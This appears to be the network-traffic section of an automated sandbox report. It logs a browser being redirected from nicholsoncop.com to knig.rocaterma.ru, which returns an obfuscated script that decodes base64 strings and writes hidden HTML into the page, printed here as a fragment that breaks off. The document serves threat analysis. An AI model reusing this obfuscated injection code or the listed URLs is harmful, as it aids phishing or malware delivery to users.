Mar 25, 2025 00:59:42.161150932 CET	443	49708	151.101.130.137	192.168.2.6
Mar 25, 2025 00:59:42.161286116 CET	49708	443	192.168.2.6	151.101.130.137
Mar 25, 2025 00:59:42.161432981 CET	49708	443	192.168.2.6	151.101.130.137
Mar 25, 2025 00:59:42.161448002 CET	443	49708	151.101.130.137	192.168.2.6
Mar 25, 2025 00:59:42.351716995 CET	443	49708	151.101.130.137	192.168.2.6
Mar 25, 2025 00:59:42.351802111 CET	49708	443	192.168.2.6	151.101.130.137
Mar 25, 2025 00:59:42.352875948 CET	49708	443	192.168.2.6	151.101.130.137
Mar 25, 2025 00:59:42.352885008 CET	443	49708	151.101.130.137	192.168.2.6
Mar 25, 2025 00:59:42.353286028 CET	443	49708	151.101.130.137	192.168.2.6
Mar 25, 2025 00:59:42.353537083 CET	49708	443	192.168.2.6	151.101.130.137
Mar 25, 2025 00:59:42.396331072 CET	443	49708	151.101.130.137	192.168.2.6
Mar 25, 2025 00:59:42.522726059 CET	443	49708	151.101.130.137	192.168.2.6
Mar 25, 2025 00:59:42.533555984 CET	443	49708	151.101.130.137	192.168.2.6
Mar 25, 2025 00:59:42.533612013 CET	443	49708	151.101.130.137	192.168.2.6
Mar 25, 2025 00:59:42.533660889 CET	49708	443	192.168.2.6	151.101.130.137
Mar 25, 2025 00:59:42.533674002 CET	443	49708	151.101.130.137	192.168.2.6
Mar 25, 2025 00:59:42.533745050 CET	49708	443	192.168.2.6	151.101.130.137
Mar 25, 2025 00:59:42.555021048 CET	443	49708	151.101.130.137	192.168.2.6
Mar 25, 2025 00:59:42.555046082 CET	443	49708	151.101.130.137	192.168.2.6
Mar 25, 2025 00:59:42.555089951 CET	49708	443	192.168.2.6	151.101.130.137
Mar 25, 2025 00:59:42.555094957 CET	443	49708	151.101.130.137	192.168.2.6
Mar 25, 2025 00:59:42.555139065 CET	49708	443	192.168.2.6	151.101.130.137
Mar 25, 2025 00:59:42.558784962 CET	80	49697	192.64.119.145	192.168.2.6
Mar 25, 2025 00:59:42.558873892 CET	49697	80	192.168.2.6	192.64.119.145
Mar 25, 2025 00:59:42.605695009 CET	49708	443	192.168.2.6	151.101.130.137
Mar 25, 2025 00:59:42.623126984 CET	443	49708	151.101.130.137	192.168.2.6
Mar 25, 2025 00:59:42.623162985 CET	443	49708	151.101.130.137	192.168.2.6
Mar 25, 2025 00:59:42.623234034 CET	49708	443	192.168.2.6	151.101.130.137
Mar 25, 2025 00:59:42.623243093 CET	443	49708	151.101.130.137	192.168.2.6
Mar 25, 2025 00:59:42.623296976 CET	49708	443	192.168.2.6	151.101.130.137
Mar 25, 2025 00:59:42.623322964 CET	49708	443	192.168.2.6	151.101.130.137
Mar 25, 2025 00:59:42.634371996 CET	443	49708	151.101.130.137	192.168.2.6
Mar 25, 2025 00:59:42.634408951 CET	443	49708	151.101.130.137	192.168.2.6
Mar 25, 2025 00:59:42.634465933 CET	49708	443	192.168.2.6	151.101.130.137
Mar 25, 2025 00:59:42.634471893 CET	443	49708	151.101.130.137	192.168.2.6
Mar 25, 2025 00:59:42.634521961 CET	49708	443	192.168.2.6	151.101.130.137
Mar 25, 2025 00:59:42.647795916 CET	443	49708	151.101.130.137	192.168.2.6
Mar 25, 2025 00:59:42.647825956 CET	443	49708	151.101.130.137	192.168.2.6
Mar 25, 2025 00:59:42.647883892 CET	49708	443	192.168.2.6	151.101.130.137
Mar 25, 2025 00:59:42.647888899 CET	443	49708	151.101.130.137	192.168.2.6
Mar 25, 2025 00:59:42.647938967 CET	49708	443	192.168.2.6	151.101.130.137
Mar 25, 2025 00:59:42.647967100 CET	49708	443	192.168.2.6	151.101.130.137
Mar 25, 2025 00:59:42.652734995 CET	443	49708	151.101.130.137	192.168.2.6
Mar 25, 2025 00:59:42.652831078 CET	49708	443	192.168.2.6	151.101.130.137
Mar 25, 2025 00:59:42.652832031 CET	443	49708	151.101.130.137	192.168.2.6
Mar 25, 2025 00:59:42.652903080 CET	49708	443	192.168.2.6	151.101.130.137
Mar 25, 2025 00:59:42.653227091 CET	49708	443	192.168.2.6	151.101.130.137
Mar 25, 2025 00:59:42.653242111 CET	443	49708	151.101.130.137	192.168.2.6
Mar 25, 2025 00:59:42.674021006 CET	49697	80	192.168.2.6	192.64.119.145
Mar 25, 2025 00:59:42.786822081 CET	80	49697	192.64.119.145	192.168.2.6
Mar 25, 2025 00:59:42.790967941 CET	49709	443	192.168.2.6	172.67.194.216
Mar 25, 2025 00:59:42.791002989 CET	443	49709	172.67.194.216	192.168.2.6
Mar 25, 2025 00:59:42.791205883 CET	49709	443	192.168.2.6	172.67.194.216
Mar 25, 2025 00:59:42.791346073 CET	49709	443	192.168.2.6	172.67.194.216
Mar 25, 2025 00:59:42.791357994 CET	443	49709	172.67.194.216	192.168.2.6
Mar 25, 2025 00:59:42.993604898 CET	443	49709	172.67.194.216	192.168.2.6
Mar 25, 2025 00:59:42.993959904 CET	49709	443	192.168.2.6	172.67.194.216
Mar 25, 2025 00:59:42.993977070 CET	443	49709	172.67.194.216	192.168.2.6
Mar 25, 2025 00:59:42.994157076 CET	49709	443	192.168.2.6	172.67.194.216
Mar 25, 2025 00:59:42.994162083 CET	443	49709	172.67.194.216	192.168.2.6
Mar 25, 2025 00:59:43.818360090 CET	443	49709	172.67.194.216	192.168.2.6
Mar 25, 2025 00:59:43.818439007 CET	443	49709	172.67.194.216	192.168.2.6
Mar 25, 2025 00:59:43.819972038 CET	49709	443	192.168.2.6	172.67.194.216
Mar 25, 2025 00:59:43.821619987 CET	49709	443	192.168.2.6	172.67.194.216
Mar 25, 2025 00:59:43.821638107 CET	443	49709	172.67.194.216	192.168.2.6
Mar 25, 2025 00:59:43.927799940 CET	49711	443	192.168.2.6	35.190.80.1
Mar 25, 2025 00:59:43.927843094 CET	443	49711	35.190.80.1	192.168.2.6
Mar 25, 2025 00:59:43.928327084 CET	49711	443	192.168.2.6	35.190.80.1
Mar 25, 2025 00:59:43.971267939 CET	49711	443	192.168.2.6	35.190.80.1
Mar 25, 2025 00:59:43.971285105 CET	443	49711	35.190.80.1	192.168.2.6
Mar 25, 2025 00:59:44.159795046 CET	443	49711	35.190.80.1	192.168.2.6
Mar 25, 2025 00:59:44.160006046 CET	49711	443	192.168.2.6	35.190.80.1
Mar 25, 2025 00:59:44.170979977 CET	49711	443	192.168.2.6	35.190.80.1
Mar 25, 2025 00:59:44.170993090 CET	443	49711	35.190.80.1	192.168.2.6
Mar 25, 2025 00:59:44.171283960 CET	443	49711	35.190.80.1	192.168.2.6
Mar 25, 2025 00:59:44.172005892 CET	49711	443	192.168.2.6	35.190.80.1
Mar 25, 2025 00:59:44.216315031 CET	443	49711	35.190.80.1	192.168.2.6
Mar 25, 2025 00:59:44.366013050 CET	443	49711	35.190.80.1	192.168.2.6
Mar 25, 2025 00:59:44.366087914 CET	443	49711	35.190.80.1	192.168.2.6
Mar 25, 2025 00:59:44.366138935 CET	49711	443	192.168.2.6	35.190.80.1
Mar 25, 2025 00:59:44.366460085 CET	49711	443	192.168.2.6	35.190.80.1
Mar 25, 2025 00:59:44.366480112 CET	443	49711	35.190.80.1	192.168.2.6
Mar 25, 2025 00:59:44.367324114 CET	49712	443	192.168.2.6	35.190.80.1
Mar 25, 2025 00:59:44.367367029 CET	443	49712	35.190.80.1	192.168.2.6
Mar 25, 2025 00:59:44.367433071 CET	49712	443	192.168.2.6	35.190.80.1
Mar 25, 2025 00:59:44.367609024 CET	49712	443	192.168.2.6	35.190.80.1
Mar 25, 2025 00:59:44.367616892 CET	443	49712	35.190.80.1	192.168.2.6
Mar 25, 2025 00:59:44.554629087 CET	443	49712	35.190.80.1	192.168.2.6
Mar 25, 2025 00:59:44.554979086 CET	49712	443	192.168.2.6	35.190.80.1
Mar 25, 2025 00:59:44.555003881 CET	443	49712	35.190.80.1	192.168.2.6
Mar 25, 2025 00:59:44.555160046 CET	49712	443	192.168.2.6	35.190.80.1
Mar 25, 2025 00:59:44.555165052 CET	443	49712	35.190.80.1	192.168.2.6
Mar 25, 2025 00:59:44.628200054 CET	49695	443	192.168.2.6	142.251.41.4
Mar 25, 2025 00:59:44.672327995 CET	443	49695	142.251.41.4	192.168.2.6
Mar 25, 2025 00:59:44.761930943 CET	443	49695	142.251.41.4	192.168.2.6
Mar 25, 2025 00:59:44.762006998 CET	443	49695	142.251.41.4	192.168.2.6
Mar 25, 2025 00:59:44.762056112 CET	49695	443	192.168.2.6	142.251.41.4
Mar 25, 2025 00:59:44.762074947 CET	443	49695	142.251.41.4	192.168.2.6
Mar 25, 2025 00:59:44.762418985 CET	443	49695	142.251.41.4	192.168.2.6
Mar 25, 2025 00:59:44.762468100 CET	49695	443	192.168.2.6	142.251.41.4
Mar 25, 2025 00:59:44.762478113 CET	443	49695	142.251.41.4	192.168.2.6
Mar 25, 2025 00:59:44.768268108 CET	443	49695	142.251.41.4	192.168.2.6
Mar 25, 2025 00:59:44.768317938 CET	49695	443	192.168.2.6	142.251.41.4
Mar 25, 2025 00:59:44.768572092 CET	49695	443	192.168.2.6	142.251.41.4
Mar 25, 2025 00:59:44.768584967 CET	443	49695	142.251.41.4	192.168.2.6
Mar 25, 2025 00:59:44.770577908 CET	443	49712	35.190.80.1	192.168.2.6
Mar 25, 2025 00:59:44.770719051 CET	443	49712	35.190.80.1	192.168.2.6
Mar 25, 2025 00:59:44.770761013 CET	49712	443	192.168.2.6	35.190.80.1
Mar 25, 2025 00:59:44.770865917 CET	49712	443	192.168.2.6	35.190.80.1
Mar 25, 2025 00:59:44.770883083 CET	443	49712	35.190.80.1	192.168.2.6
Mar 25, 2025 00:59:44.770896912 CET	49712	443	192.168.2.6	35.190.80.1
Mar 25, 2025 00:59:44.770925999 CET	49712	443	192.168.2.6	35.190.80.1
Mar 25, 2025 00:59:55.342686892 CET	80	49696	192.64.119.145	192.168.2.6
Mar 25, 2025 00:59:55.348033905 CET	49696	80	192.168.2.6	192.64.119.145
Mar 25, 2025 00:59:56.025423050 CET	49696	80	192.168.2.6	192.64.119.145
Mar 25, 2025 00:59:56.132631063 CET	80	49696	192.64.119.145	192.168.2.6
Mar 25, 2025 01:00:07.388320923 CET	49698	443	192.168.2.6	192.64.119.145
Mar 25, 2025 01:00:07.432333946 CET	443	49698	192.64.119.145	192.168.2.6
Mar 25, 2025 01:00:36.138394117 CET	49717	443	192.168.2.6	142.251.41.4
Mar 25, 2025 01:00:36.138448000 CET	443	49717	142.251.41.4	192.168.2.6
Mar 25, 2025 01:00:36.138509989 CET	49717	443	192.168.2.6	142.251.41.4
Mar 25, 2025 01:00:36.138757944 CET	49717	443	192.168.2.6	142.251.41.4
Mar 25, 2025 01:00:36.138767958 CET	443	49717	142.251.41.4	192.168.2.6
Mar 25, 2025 01:00:36.329657078 CET	443	49717	142.251.41.4	192.168.2.6
Mar 25, 2025 01:00:36.349169970 CET	49717	443	192.168.2.6	142.251.41.4
Mar 25, 2025 01:00:36.349236965 CET	443	49717	142.251.41.4	192.168.2.6
Mar 25, 2025 01:00:41.575867891 CET	49702	80	192.168.2.6	142.251.40.163
Mar 25, 2025 01:00:41.664918900 CET	80	49702	142.251.40.163	192.168.2.6
Mar 25, 2025 01:00:41.664973974 CET	49702	80	192.168.2.6	142.251.40.163
Mar 25, 2025 01:00:46.328291893 CET	443	49717	142.251.41.4	192.168.2.6
Mar 25, 2025 01:00:46.328447104 CET	443	49717	142.251.41.4	192.168.2.6
Mar 25, 2025 01:00:46.328538895 CET	49717	443	192.168.2.6	142.251.41.4
Mar 25, 2025 01:00:48.036294937 CET	49717	443	192.168.2.6	142.251.41.4
Mar 25, 2025 01:00:48.036386967 CET	443	49717	142.251.41.4	192.168.2.6
Mar 25, 2025 01:00:52.434000015 CET	49698	443	192.168.2.6	192.64.119.145
Mar 25, 2025 01:00:52.434015989 CET	443	49698	192.64.119.145	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 25, 2025 00:59:31.727272034 CET	53	62436	1.1.1.1	192.168.2.6
Mar 25, 2025 00:59:31.846052885 CET	53	52903	1.1.1.1	192.168.2.6
Mar 25, 2025 00:59:32.502926111 CET	53	55115	1.1.1.1	192.168.2.6
Mar 25, 2025 00:59:36.076893091 CET	56327	53	192.168.2.6	1.1.1.1
Mar 25, 2025 00:59:36.077194929 CET	49822	53	192.168.2.6	1.1.1.1
Mar 25, 2025 00:59:36.173357010 CET	53	56327	1.1.1.1	192.168.2.6
Mar 25, 2025 00:59:36.174707890 CET	53	49822	1.1.1.1	192.168.2.6
Mar 25, 2025 00:59:37.224967003 CET	58393	53	192.168.2.6	1.1.1.1
Mar 25, 2025 00:59:37.225323915 CET	58469	53	192.168.2.6	1.1.1.1
Mar 25, 2025 00:59:37.235642910 CET	55586	53	192.168.2.6	1.1.1.1
Mar 25, 2025 00:59:37.235871077 CET	64050	53	192.168.2.6	1.1.1.1
Mar 25, 2025 00:59:37.329432964 CET	53	58469	1.1.1.1	192.168.2.6
Mar 25, 2025 00:59:37.334177017 CET	53	58393	1.1.1.1	192.168.2.6
Mar 25, 2025 00:59:37.340476036 CET	53	55586	1.1.1.1	192.168.2.6
Mar 25, 2025 00:59:37.380141020 CET	53	64050	1.1.1.1	192.168.2.6
Mar 25, 2025 00:59:40.345582008 CET	61090	53	192.168.2.6	1.1.1.1
Mar 25, 2025 00:59:40.345748901 CET	57062	53	192.168.2.6	1.1.1.1
Mar 25, 2025 00:59:40.696091890 CET	53	57062	1.1.1.1	192.168.2.6
Mar 25, 2025 00:59:40.700540066 CET	53	61090	1.1.1.1	192.168.2.6
Mar 25, 2025 00:59:42.062470913 CET	59755	53	192.168.2.6	1.1.1.1
Mar 25, 2025 00:59:42.062678099 CET	58964	53	192.168.2.6	1.1.1.1
Mar 25, 2025 00:59:42.160279036 CET	53	58964	1.1.1.1	192.168.2.6
Mar 25, 2025 00:59:42.160303116 CET	53	59755	1.1.1.1	192.168.2.6
Mar 25, 2025 00:59:42.872052908 CET	53	61760	1.1.1.1	192.168.2.6
Mar 25, 2025 00:59:43.819947004 CET	60095	53	192.168.2.6	1.1.1.1
Mar 25, 2025 00:59:43.820452929 CET	50425	53	192.168.2.6	1.1.1.1
Mar 25, 2025 00:59:43.923402071 CET	53	60095	1.1.1.1	192.168.2.6
Mar 25, 2025 00:59:43.925154924 CET	53	50425	1.1.1.1	192.168.2.6
Mar 25, 2025 00:59:49.535131931 CET	53	58494	1.1.1.1	192.168.2.6
Mar 25, 2025 01:00:08.347493887 CET	53	54609	1.1.1.1	192.168.2.6
Mar 25, 2025 01:00:19.119733095 CET	138	138	192.168.2.6	192.168.2.255
Mar 25, 2025 01:00:30.917814970 CET	53	62400	1.1.1.1	192.168.2.6
Mar 25, 2025 01:00:31.413361073 CET	53	52240	1.1.1.1	192.168.2.6
Mar 25, 2025 01:00:34.343790054 CET	53	61870	1.1.1.1	192.168.2.6

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Mar 25, 2025 00:59:37.380203962 CET	192.168.2.6	1.1.1.1	c22e	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 25, 2025 00:59:36.076893091 CET	192.168.2.6	1.1.1.1	0x1244	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Mar 25, 2025 00:59:36.077194929 CET	192.168.2.6	1.1.1.1	0x1b7d	Standard query (0)	www.google.com	65	IN (0x0001)	false
Mar 25, 2025 00:59:37.224967003 CET	192.168.2.6	1.1.1.1	0x5527	Standard query (0)	nicholsoncop.com	A (IP address)	IN (0x0001)	false
Mar 25, 2025 00:59:37.225323915 CET	192.168.2.6	1.1.1.1	0xc6cf	Standard query (0)	nicholsoncop.com	65	IN (0x0001)	false
Mar 25, 2025 00:59:37.235642910 CET	192.168.2.6	1.1.1.1	0x77a6	Standard query (0)	nicholsoncop.com	A (IP address)	IN (0x0001)	false
Mar 25, 2025 00:59:37.235871077 CET	192.168.2.6	1.1.1.1	0xae27	Standard query (0)	nicholsoncop.com	65	IN (0x0001)	false
Mar 25, 2025 00:59:40.345582008 CET	192.168.2.6	1.1.1.1	0x9ee3	Standard query (0)	knig.rocaterma.ru	A (IP address)	IN (0x0001)	false
Mar 25, 2025 00:59:40.345748901 CET	192.168.2.6	1.1.1.1	0xd3ca	Standard query (0)	knig.rocaterma.ru	65	IN (0x0001)	false
Mar 25, 2025 00:59:42.062470913 CET	192.168.2.6	1.1.1.1	0xc304	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
Mar 25, 2025 00:59:42.062678099 CET	192.168.2.6	1.1.1.1	0x794f	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
Mar 25, 2025 00:59:43.819947004 CET	192.168.2.6	1.1.1.1	0x9a01	Standard query (0)	a.nel.cloudflare.com	A (IP address)	IN (0x0001)	false
Mar 25, 2025 00:59:43.820452929 CET	192.168.2.6	1.1.1.1	0xb6dd	Standard query (0)	a.nel.cloudflare.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Mar 25, 2025 00:59:36.173357010 CET	1.1.1.1	192.168.2.6	0x1244	No error (0)	www.google.com	142.251.41.4	A (IP address)	IN (0x0001)	false
Mar 25, 2025 00:59:36.174707890 CET	1.1.1.1	192.168.2.6	0x1b7d	No error (0)	www.google.com		65	IN (0x0001)	false
Mar 25, 2025 00:59:37.334177017 CET	1.1.1.1	192.168.2.6	0x5527	No error (0)	nicholsoncop.com	192.64.119.145	A (IP address)	IN (0x0001)	false
Mar 25, 2025 00:59:37.340476036 CET	1.1.1.1	192.168.2.6	0x77a6	No error (0)	nicholsoncop.com	192.64.119.145	A (IP address)	IN (0x0001)	false
Mar 25, 2025 00:59:40.696091890 CET	1.1.1.1	192.168.2.6	0xd3ca	No error (0)	knig.rocaterma.ru		65	IN (0x0001)	false
Mar 25, 2025 00:59:40.700540066 CET	1.1.1.1	192.168.2.6	0x9ee3	No error (0)	knig.rocaterma.ru	172.67.194.216	A (IP address)	IN (0x0001)	false
Mar 25, 2025 00:59:40.700540066 CET	1.1.1.1	192.168.2.6	0x9ee3	No error (0)	knig.rocaterma.ru	104.21.36.139	A (IP address)	IN (0x0001)	false
Mar 25, 2025 00:59:42.160303116 CET	1.1.1.1	192.168.2.6	0xc304	No error (0)	code.jquery.com	151.101.130.137	A (IP address)	IN (0x0001)	false
Mar 25, 2025 00:59:42.160303116 CET	1.1.1.1	192.168.2.6	0xc304	No error (0)	code.jquery.com	151.101.66.137	A (IP address)	IN (0x0001)	false
Mar 25, 2025 00:59:42.160303116 CET	1.1.1.1	192.168.2.6	0xc304	No error (0)	code.jquery.com	151.101.2.137	A (IP address)	IN (0x0001)	false
Mar 25, 2025 00:59:42.160303116 CET	1.1.1.1	192.168.2.6	0xc304	No error (0)	code.jquery.com	151.101.194.137	A (IP address)	IN (0x0001)	false
Mar 25, 2025 00:59:43.923402071 CET	1.1.1.1	192.168.2.6	0x9a01	No error (0)	a.nel.cloudflare.com	35.190.80.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

knig.rocaterma.ru

code.jquery.com

a.nel.cloudflare.com

www.google.com

nicholsoncop.com

c.pki.goog

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49696	192.64.119.145	80	4920	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Mar 25, 2025 00:59:40.235582113 CET	431	OUT	GET / HTTP/1.1 Host: nicholsoncop.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Mar 25, 2025 00:59:40.342776060 CET	303	IN	HTTP/1.1 302 Found Date: Mon, 24 Mar 2025 23:59:40 GMT Content-Type: text/html; charset=utf-8 Content-Length: 55 Connection: keep-alive Location: https://knig.rocaterma.ru/krVkG/ X-Served-By: Namecheap URL Forward Server: namecheap-nginx Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6b 6e 69 67 2e 72 6f 63 61 74 65 72 6d 61 2e 72 75 2f 6b 72 56 6b 47 2f 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href='https://knig.rocaterma.ru/krVkG/'>Found</a>.

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.6	49702	142.251.40.163	80

Timestamp	Bytes transferred	Direction	Data
Mar 25, 2025 00:59:41.193380117 CET	202	OUT	GET /r/gsr1.crl HTTP/1.1 Cache-Control: max-age = 3000 Connection: Keep-Alive Accept: / If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT User-Agent: Microsoft-CryptoAPI/10.0 Host: c.pki.goog
Mar 25, 2025 00:59:41.284147024 CET	223	IN	HTTP/1.1 304 Not Modified Date: Mon, 24 Mar 2025 23:39:48 GMT Expires: Tue, 25 Mar 2025 00:29:48 GMT Age: 1193 Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT Cache-Control: public, max-age=3000 Vary: Accept-Encoding
Mar 25, 2025 00:59:41.290163040 CET	200	OUT	GET /r/r4.crl HTTP/1.1 Cache-Control: max-age = 3000 Connection: Keep-Alive Accept: / If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT User-Agent: Microsoft-CryptoAPI/10.0 Host: c.pki.goog
Mar 25, 2025 00:59:41.379710913 CET	223	IN	HTTP/1.1 304 Not Modified Date: Mon, 24 Mar 2025 23:30:24 GMT Expires: Tue, 25 Mar 2025 00:20:24 GMT Age: 1757 Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT Cache-Control: public, max-age=3000 Vary: Accept-Encoding

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49700	172.67.194.216	443	4920	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 23:59:40 UTC	673	OUT	GET /krVkG/ HTTP/1.1 Host: knig.rocaterma.ru Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 23:59:41 UTC	1210	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 23:59:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, private cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fvj1ha0B8QcZqEoIlSUTLcsLfQ%2BLpL9wHlj9TQDorcQqx6L5bjkz32WSprX1UEDAWWyhj38AvSWFYgTT7yDc1EXIZTqw0TqdRUvptuJbtcxbDx7fPMzvuq1Egp02NLP1rvew"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} server-timing: cfL4;desc="?proto=TCP&rtt=10413&min_rtt=10328&rtt_var=3934&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1576&delivery_rate=275755&cwnd=249&unsent_bytes=0&cid=dc25ebc496f3f5ef&ts=288&x=0" Set-Cookie: XSRF-TOKEN=eyJpdiI6IjFzSmg2UGNrNGViZlF1ZmtKNDNTUHc9PSIsInZhbHVlIjoiL2d5dVNCWjhGTyszVUxSa25vZVd2TnZHVFU1VFg4SUl4ekNtV2VJbTBrdXNQMmYxWXc0dzZUMVZVanNpYytuNVRvZ29ZZFpnNmVVekJZVlAyc1p5c3JlRlV4RTB2NzIrSWJjTWhKR0ZYbG9JcUpPU0g1c0xhWk1rbGRtaVA4eTEiLCJtYWMiOiJjZmQzMTUxOWZmZmU1Y2FhOTVkZWVmZTZhZDQ0MWJkN2U4MTJkOWFmNjZjNjhjMjBhZTMyNmEwOTNmNjIxMmYzIiwidGFnIjoiIn0%3D; expires=Tue, 25-Mar-2025 01:59:41 GMT; Max-Age=7200; path=/; secure; samesite=none
2025-03-24 23:59:41 UTC	764	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 4a 75 53 6a 42 30 4d 7a 68 79 52 55 6b 72 55 57 4a 53 61 56 6b 76 55 32 39 32 56 46 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4e 6b 39 4b 53 45 63 78 4e 46 64 46 57 6d 39 6c 64 48 56 71 57 58 56 70 65 6e 52 78 54 48 64 69 4d 48 68 58 4c 32 77 34 61 58 6c 70 61 48 6c 56 51 55 31 51 51 32 31 79 56 58 6b 77 52 32 39 32 55 30 52 4c 4d 30 70 6a 53 55 6c 32 64 55 68 59 4d 54 4e 57 55 6c 46 36 59 55 74 53 5a 32 68 34 62 57 4e 57 5a 47 70 4d 65 55 6c 6e 65 6d 4a 47 52 44 4d 78 64 45 68 46 4d 47 64 5a 57 45 49 35 4e 55 4e 61 55 54 42 35 61 57 4e 4c 63 57 39 36 61 57 39 49 4e 44 55 72 64 31 56 32 64 54 42 34 4f 48 42 70 57 45 52 57 56 6e 59 Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlJuSjB0MzhyRUkrUWJSaVkvU292VFE9PSIsInZhbHVlIjoiNk9KSEcxNFdFWm9ldHVqWXVpenRxTHdiMHhXL2w4aXlpaHlVQU1QQ21yVXkwR292U0RLM0pjSUl2dUhYMTNWUlF6YUtSZ2h4bWNWZGpMeUlnemJGRDMxdEhFMGdZWEI5NUNaUTB5aWNLcW96aW9INDUrd1V2dTB4OHBpWERWVnY
2025-03-24 23:59:41 UTC	1369	IN	Data Raw: 37 66 66 61 0d 0a 3c 73 63 72 69 70 74 3e 0a 59 46 4b 77 48 66 5a 47 55 63 20 3d 20 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 72 54 6d 6c 48 4c 6e 4a 76 59 32 46 30 5a 58 4a 74 59 53 35 79 64 53 39 72 63 6c 5a 72 52 79 38 3d 22 29 3b 0a 72 63 52 41 79 78 66 6c 43 64 20 3d 20 61 74 6f 62 28 22 62 6d 39 74 59 58 52 6a 61 41 3d 3d 22 29 3b 0a 55 4f 71 43 55 67 55 59 75 42 20 3d 20 61 74 6f 62 28 22 64 33 4a 70 64 47 55 3d 22 29 3b 0a 69 66 28 59 46 4b 77 48 66 5a 47 55 63 20 3d 3d 20 72 63 52 41 79 78 66 6c 43 64 29 7b 0a 64 6f 63 75 6d 65 6e 74 5b 55 4f 71 43 55 67 55 59 75 42 5d 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 43 6a 78 6f Data Ascii: 7ffa<script>YFKwHfZGUc = atob("aHR0cHM6Ly9rTmlHLnJvY2F0ZXJtYS5ydS9rclZrRy8=");rcRAyxflCd = atob("bm9tYXRjaA==");UOqCUgUYuB = atob("d3JpdGU=");if(YFKwHfZGUc == rcRAyxflCd){document[UOqCUgUYuB](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+Cjxo
2025-03-24 23:59:41 UTC	1369	IN	Data Raw: 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f Data Ascii: 